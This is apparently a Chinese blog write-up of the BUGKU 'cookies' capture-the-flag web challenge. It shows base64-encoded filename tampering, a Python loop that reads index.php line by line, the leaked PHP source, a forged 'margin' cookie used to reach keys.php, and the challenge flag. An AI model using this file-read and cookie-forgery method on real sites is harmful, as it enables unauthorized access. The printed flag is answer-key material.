BUGKU-WEB cookies

最新推荐文章于 2024-03-31 17:12:49 发布
最新推荐文章于 2024-03-31 17:12:49 发布
阅读量1.3k 收藏 29
点赞数 18
分类专栏: BUGKU 文章标签: BUGKU
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36292543/article/details/136664463
版权

题目描述

题目截图如下:
在这里插入图片描述

进入场景看看:
在这里插入图片描述

解题思路

  • 看源码
  • 看F12:看请求链接
  • 看提示:cookies欺骗

相关工具

解题步骤

  1. 看源码

在这里插入图片描述
就是rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry字母的重复。
2. 看F12:看请求链接

http://114.67.175.224:11931/index.php?line=3&filename=a2V5cy50eHQ=

在这里插入图片描述
好像有base64加密:a2V5cy50eHQ==,解密得到keys.txt。
这个文件内容和进入场景看到的一致:http://114.67.175.224:11931/keys.txt
在这里插入图片描述
还有一个line参数,修改并没有发生任何变化。我想不到要改keys.txt成index.php(base64加密格式:aW5kZXgucGhw):

http://114.67.175.224:11931/index.php?line=1&filename=aW5kZXgucGhw==
  • line=1时:
    在这里插入图片描述
  • line=2时:
    在这里插入图片描述
    以此类推得到该文件源码,当然是用脚本跑不出来啦:
import requests

a=25 #表示index.php文件的代码行数
for i in range(a):
    url="http://114.67.175.224:11931/index.php?line="+str(i)+"&filename=aW5kZXgucGhw=="
    s=requests.get(url)
    print(s.text)

得到:

<? php
error_reporting(0);
$file = base64_decode(isset($_GET['filename']) ? $_GET['filename'] : "");
$line = isset($_GET['line']) ? intval($_GET['line']) : 0;
if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' => 'keys.txt',
    '1' => 'index.php',
);
if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') {
    $file_list[2] = 'keys.php';
}
if (in_array($file, $file_list)) {
    $fa = file($file);
    echo $fa[$line];
} ?>

部分解释:

定义了一个文件列表数组$file_list,包含了两个默认的文件keys.txt和index.php。如果COOKIE中存在名为’margin’的值,并且该值为’margin’,则将一个名为’keys.php’的文件添加到文件列表中。也就是cookie值为margin时显示keys.php内容。

3.看提示:cookies欺骗。即然没有什么其他的,那就按照提示来。设置cookie:margin=margin,base64编码keys.php

http://114.67.175.224:11931/index.php?line=&filename=a2V5cy5waHA=

在这里插入图片描述
在这里插入图片描述

得到Flag

flag{2457d80f9f5a80e6d24f0ed0ac47dabb}

在这里插入图片描述

新知识点

  • Cookie
  • 用户在登录之后通常会保存用户信息,以便在其他需要权限的页面去验证用户信息是否具有访问权限。
  • 一个页面是否能够被访问,判断依据是通过存储信息区域中用户的信息来判断的
  • 登录页面的作用就是 验证 用户输入的用户名+密码的组合是否在数据库中存在,如果存在则把信息保存在存储信息的区域,以便各个页面去判断权限
  • 信息存储区域对于我们来说至关重要,一般常见的有两种形式,session和cookies:
  • 不同的用户在访问网站的时候 都会拥有各自的session或者cookies,不同用户之间互不干扰。
  • session在服务器端产生,比较安全,但是如果session较多则会影响性能. cookies在客户端产生,安全性稍弱
    session生命周期 在指定的时间(如20分钟)到了之后会结束,不到指定的时间,也会随着浏览器进程的结束而结束。
  • cookies默认情况下也随着浏览器进程结束而结束,但如果手动指定时间,则不受浏览器进程结束的影响。

有用的话,请点赞收藏评论,帮助更多的同学哦

默默提升实验室
关注
专栏目录
伪造cookies --bugku 23cookies欺骗
s11show_163的博客
11-28 742
首先抬头看url发现有点儿类似sql注入,结尾base64解码后发现是key.txt于是根据经验先试一试如果是index.php会怎么样,前面的line=显然也可以传参数进去,于是写一个脚本如下: import requests import base64 r = requests.session() for i in range(30): url="http://123.206.87.240...
Bugku——cookies欺骗
Dig_的博客
09-22 1154
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
bugku cookies
hintll的博客
06-17 1720
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性的看一下源码: 源码里也是什么都没有 f12看一下网络: 无意间看到了一个特殊的参数: http://114.67.246.176:12368/index.php?line=&filename=a2V5cy50eHQ= 后来仔细看,才发现这是URL a2V5cy50eHQ=像是一个base64的
bugku-cookies
m0_62094846的博客
10-27 1025
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
BugKu_cookies
Kobalos的博客
08-10 439
访问目标地址,发现了一串不知道在表达什么的字符串 看到url最后是一个base64加密了的字符串“a2V5cy50eHQ=”,尝试解码 尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=2 那么尝试把line改成3看看会发生什么呢 到这里可以猜测,每改一次行数就会显示一行源码! 我们尝试把line改成20的时候,发现是个空白页,不断减少范围,发现共有18行源代码! 构造脚本! 代码如下: im.
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Bugku-webcookies
weixin_42939822的博客
03-13 1606
一打开题目,发现一系列重复的字符串,受到“备份是个好习惯”题目的影响,不自觉地对这串字符串进行了各种解密,无果…… 此时思路堵塞,无意间看到url中的payload格式,对filename变量进行了base64解码,得到了keys.txt的结果。 想到可能存在php常见的文件包含问题,于是对filename变量进行了更改,变更为index.php的base64加密,同时猜测line变量表示源码的行数,先另line=3,进行尝试,喜得猜想结果。 于是编写脚本,对index.php的源码进行提取。
BUGKU-WEB
wojiushilsy的博客
02-22 567
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3393
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 375
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
bugku-web-cookies
最新发布
qq_75121443的博客
03-31 409
我们想得到flag就要对唯一控制页面显示的文件index.php的源码进行查看。而line,经过猜测,就是传递请求的文件filename的行数。所以这里直接利用任意文件读取漏洞进行index.php的查看。这里就是让将cookies添加字段margin=margin。filename已经得知就是传递base加密后的文件名。仔细观察字段发现,居然是一个字符串重复导致的长字符串。解密后看到位keys.txt文件的加密。进来以后看到一个巨长的字符串。得到index.php的源码。说明这里的字符串为key。
Bugku-cookie
qq_51979295的博客
09-09 403
时间:2023年9月9日 类型:Web cookie base64发现get传参给变量filename了一个base64加密数据,解码后为key.txt,将字符串“index.php”base64编码后传给filename变量,再改变line的值来遍历主页源码,编写简易脚本跑一下 得到源码 代码分析 页面读取是先用了base64 decode再访问的,同时还会检查该页面在不在访问列表中。所以我们要将要访问的页面进行base64编码之后再传参,同时要注意访问文件是否在访问列表中 当获取到cookie ma
cookie欺骗(bugku)
weixin_46396711的博客
04-28 1331
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 702
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
bugku--cookie欺骗
YenKoc的博客
11-30 316
打开题目一看,是一串的东西,再看了一下filename发现不对劲了,明显是base64编码,拿去解码一下, 发现是这个,说明是filename,是需要解析的哪个文件名,把index.php编码一下,试试, 说明line需要去操作的,才可以把index.php给弄出来.直接上脚本 顺着代码意思,加入cookie就完事了。 ...
cookie欺骗(bugku
hhh
09-06 2465
利用cookie值进行攻击; 完全没有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有没有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&amp;fillename=key.txt; 另外url里还有一个参数:line...
Bugku——cookie欺骗
csu_vc的博客
10-28 8461
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
cookies-Bugku CTF
Alasding的博客
09-10 338
一看题目cookies,首先想到的就是抓包 抓包一看,emmm……毫无头绪哪 不过看url: /index.php?line=&filename=a2V5cy50eHQ= ”line=“空肯定是要设置一下什么参数 filename的值一看就是base64加密的密文呀 先解出来看看:keys.txt 但是keys.txt返回值什么都看不出来…… 想了半天……看见那个filename可以换一下参数看看别的文件还能不能看呀,最简单的最常用的就是index.php base64加密:aW5kZXgucGh
HTTP-only Cookies
04-25
HTTP-only Cookies 是什么? HTTP-only Cookies 是一种 Cookie,仅通过 HTTP 或 HTTPS 访问,无法通过客户端脚本(例如 JavaScript)访问。这可以提高对 Cookie 的安全性,因为它可以有效地防止恶意脚本访问 Cookie...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值